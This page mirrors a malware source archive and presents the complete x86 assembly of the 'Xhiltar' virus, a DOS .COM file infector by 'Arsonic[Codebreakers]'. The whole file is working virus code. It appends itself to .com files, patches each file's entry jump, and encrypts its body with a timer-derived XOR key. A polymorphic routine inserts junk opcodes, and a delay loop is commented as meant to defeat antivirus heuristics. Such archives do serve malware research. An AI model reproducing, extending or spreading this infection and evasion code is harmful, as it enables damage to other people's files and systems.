mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
151 lines
3.7 KiB
NASM
151 lines
3.7 KiB
NASM
|
; The Xhiltar Virus
|
||
|
; By Arsonic[Codebreakers]
|
||
|
; Type: Runtime Appending Com Infector
|
||
|
; Encrypted: Yes
|
||
|
; Polymorphic: Yes
|
||
|
; Time/Date: Yes
|
||
|
; add Attrib: Yes
|
||
|
; Changes Directory's: Yes (dotdot method)
|
||
|
; Anti-Anti-Virus: Yes (anti-heuristics)
|
||
|
db 0e9h,0,0
|
||
|
start:
|
||
|
call delta
|
||
|
delta:
|
||
|
pop bp
|
||
|
sub bp,offset delta
|
||
|
mov cx,0ffffh ;fuck up those heristics!
|
||
|
fprot_loopy:
|
||
|
jmp back
|
||
|
mov ax,4c00h
|
||
|
int 21h
|
||
|
back:
|
||
|
loop fprot_loopy
|
||
|
lea si,[bp+hidden_start]
|
||
|
mov di,si
|
||
|
mov cx,end - hidden_start
|
||
|
call encryption
|
||
|
jmp hidden_start
|
||
|
value db 0
|
||
|
encryption: ;encryption routine
|
||
|
call poly
|
||
|
encrypt:
|
||
|
lodsb ;1
|
||
|
_1stDummy:
|
||
|
nop ;1 = +1
|
||
|
xor al,byte ptr[bp+value] ;4
|
||
|
_2ndDummy:
|
||
|
nop ;1 = +6
|
||
|
stosb ;1
|
||
|
_3rdDummy:
|
||
|
nop ;1 = +8
|
||
|
loop encrypt ;2
|
||
|
_4thDummy:
|
||
|
nop ;1 = +11
|
||
|
ret
|
||
|
hidden_start:
|
||
|
mov cx,3
|
||
|
mov di,100h ;restore the first 3 bytes
|
||
|
lea si,[bp+buff]
|
||
|
rep movsb
|
||
|
find_first: ;find first file
|
||
|
mov ah,4eh
|
||
|
find_next:
|
||
|
lea dx,[bp+filemask]
|
||
|
xor cx,cx ;with 0 attrib's..
|
||
|
int 21h
|
||
|
jnc infect
|
||
|
close:
|
||
|
push 100h
|
||
|
ret
|
||
|
infect:
|
||
|
mov ax,3d02h ;open file
|
||
|
mov dx,9eh
|
||
|
int 21h
|
||
|
xchg bx,ax
|
||
|
mov ax,5700h ;get time/date
|
||
|
int 21h
|
||
|
push dx ;save the values
|
||
|
push cx
|
||
|
in al,40h ;get new encrypt value from system clock
|
||
|
mov byte ptr [bp+value],al
|
||
|
mov ah,3fh ;read 3 bytes from the file.. too
|
||
|
mov cx,3 ;be replaced with a jump to the virus
|
||
|
lea dx,[bp+buff]
|
||
|
int 21h
|
||
|
mov ax,word ptr [80h + 1ah] ;check for infect
|
||
|
sub ax,end - start + 3
|
||
|
cmp ax,word ptr[bp+buff+1]
|
||
|
je close_file
|
||
|
mov ax,word ptr[80h + 1ah]
|
||
|
sub ax,3
|
||
|
mov word ptr[bp+three+1],ax
|
||
|
mov ax,4200h ;goto start of file
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
int 21h
|
||
|
mov ah,40h ;write the 3 byte jump
|
||
|
lea dx,[bp+three]
|
||
|
mov cx,3
|
||
|
int 21h
|
||
|
mov ax,4202h ;goto end of file
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
int 21h
|
||
|
mov ah,40h ;write the unencrypted area
|
||
|
lea dx,[bp+start]
|
||
|
mov cx,hidden_start - start
|
||
|
int 21h
|
||
|
lea si,[bp+hidden_start] ;encrypt the virus
|
||
|
lea di,[bp+end]
|
||
|
mov cx,end - hidden_start
|
||
|
call encryption
|
||
|
mov ah,40h ;write encrypted area
|
||
|
lea dx,[bp+end]
|
||
|
mov cx,end - hidden_start
|
||
|
int 21h
|
||
|
close_file:
|
||
|
mov ax,5701h ;restore time/date
|
||
|
pop cx ;with saved values
|
||
|
pop dx
|
||
|
int 21h
|
||
|
mov ah,3eh ;close file
|
||
|
int 21h
|
||
|
mov ah,4Fh ;find next file
|
||
|
jmp find_next
|
||
|
poly:
|
||
|
call random ;get random value
|
||
|
mov [bp+_1stDummy],dl ;write random do-nothing call to encrypt
|
||
|
call random
|
||
|
mov [bp+_2ndDummy],dl
|
||
|
call random
|
||
|
mov [bp+_3rdDummy],dl
|
||
|
call random
|
||
|
mov [bp+_4thDummy],dl
|
||
|
ret
|
||
|
garbage:
|
||
|
nop ; no operation instruction
|
||
|
clc ; Clear Carry
|
||
|
stc ; Set Carry
|
||
|
sti ; Set Interuppt Flag
|
||
|
cld ; Clear Direction Flag
|
||
|
cbw ; Convert byte to word
|
||
|
inc dx ; increase dx
|
||
|
dec dx ; decrease dx
|
||
|
lahf ; loads AH with flags
|
||
|
random:
|
||
|
in ax,40h
|
||
|
and ax,7
|
||
|
xchg bx,ax
|
||
|
add bx,offset garbage
|
||
|
add bx,bp
|
||
|
mov dl,[bx]
|
||
|
ret
|
||
|
filemask db '*.com',0
|
||
|
three db 0e9h,0,0
|
||
|
buff db 0cdh,20h,0
|
||
|
dotdot db '..',0
|
||
|
author db 'Arsonic[Codebreakers]',13,10,'$'
|
||
|
virus db 'the XHiLTAR virus',13,10,'$'
|
||
|
db 'I LOVE U LISA',13,10,'$'
|
||
|
db 'I LOVE U SOOOO MUCH!',13,10,'$'
|
||
|
end:
|